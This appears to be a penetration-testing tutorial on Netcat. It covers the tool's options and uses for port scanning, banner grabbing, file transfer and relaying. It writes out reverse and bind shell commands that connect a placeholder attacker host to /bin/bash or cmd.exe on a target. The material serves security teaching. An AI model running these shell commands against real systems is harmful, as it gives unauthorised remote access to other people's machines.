

Netcat (nc) is a versatile networking tool often referred to as the "Swiss Army knife" of networking. It can read and write data across network connections using the TCP/IP protocol. It is commonly used in penetration testing for various purposes, including banner grabbing, port scanning, and creating reverse or bind shells.

Uses of Netcat in Penetration Testing

  1. Port Scanning

  2. Banner Grabbing

  3. Transferring Files

  4. Creating Reverse Shells

  5. Creating Bind Shells

  6. Listening for Connections

  7. Relaying Traffic

Reverse Shell and Bind Shell

  • Reverse Shell: The target machine connects back to the attacker's machine. This is useful when the target machine is behind a firewall or NAT.

  • Bind Shell: The target machine opens a listening port, and the attacker connects to this port. This is useful when the target machine has a publicly accessible IP address.

Netcat Options and Usage

Basic Netcat Options

  • -l: Listen mode, for inbound connections.

  • -p: Local port number.

  • -e: Program to execute after connection is established.

  • -v: Verbose mode.

  • -z: Zero-I/O mode, for scanning.

  • -n: Numeric-only IP addresses, no DNS.

  • -w: Timeout for connects and final net reads.

  • -u: UDP mode.

  • -k: Keep inbound sockets open for multiple connections.

  • -c: Send CRLF as line-ending.

Common Netcat Use Cases

  1. Port Scanning

nc -zv <target_ip> 1-1000
  • -z: Zero-I/O mode.

  • -v: Verbose mode.

  • <target_ip>: Target IP address.

  • 1-1000: Port range to scan.

  1. Banner Grabbing

nc -v <target_ip> <port>
  • -v: Verbose mode.

  • <target_ip>: Target IP address.

  • <port>: Target port (e.g., 80 for HTTP).

  1. Transferring Files


nc -l -p <port> < file_to_send
  • -l: Listen mode.

  • -p: Local port.


nc <sender_ip> <port> > received_file
  1. Creating a Reverse Shell

On the Attacker’s Machine:

nc -l -p <port>

On the Target Machine:

nc <attacker_ip> <port> -e /bin/bash
  • -e: Program to execute (e.g., /bin/bash for Linux).

  1. Creating a Bind Shell

On the Target Machine:

nc -l -p <port> -e /bin/bash

On the Attacker’s Machine:

nc <target_ip> <port>
  1. Listening for Connections

nc -l -p <port>
  1. Relaying Traffic

nc -l -p <local_port> | nc <remote_ip> <remote_port>

Detailed Examples

Example: Reverse Shell on Linux

Attacker’s Machine:

nc -lvp 4444

Target Machine:

nc <attacker_ip> 4444 -e /bin/bash

Example: Bind Shell on Windows

Target Machine:

nc -lvp 4444 -e cmd.exe

Attacker’s Machine:

nc <target_ip> 4444

Example: File Transfer

Send a File:


nc -l -p 4444 < file.txt


nc <sender_ip> 4444 > file.txt


  1. Netcat Documentation: Netcat Guide

  2. Penetration Testing with Netcat: Penetration Testing Lab

  3. Reverse Shells and Bind Shells: Reverse Shell Cheatsheet

By mastering Netcat, penetration testers can effectively perform a variety of network tasks, enhance their toolkit, and better understand network vulnerabilities and potential attack vectors.

Last updated

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